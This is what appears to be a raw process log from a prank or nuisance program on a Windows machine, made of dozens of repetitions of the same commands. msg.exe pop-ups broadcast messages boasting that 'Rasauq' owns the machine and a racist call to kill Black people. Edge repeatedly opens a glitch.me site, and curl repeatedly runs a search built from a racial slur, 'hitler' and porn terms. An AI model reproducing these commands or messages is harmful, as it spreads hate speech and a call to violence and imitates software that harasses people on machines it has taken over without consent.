C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5900,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6048,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5728 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6224,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6256 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6400,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6576,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6580 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6752,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6904,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6588 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7060,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7088 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=7284,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=7452,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7460 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=6912,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7412 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7788,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7796 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=8124,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8132 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7828,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8296 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=8592,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8604 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8628,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8784 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=9072,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=9304,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9312 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=9560,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9568 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9828,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9844 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=10052,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10060 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9328,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10220 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=10392,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10416 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10648,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10672 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10864,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10880 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=10640,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11032 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

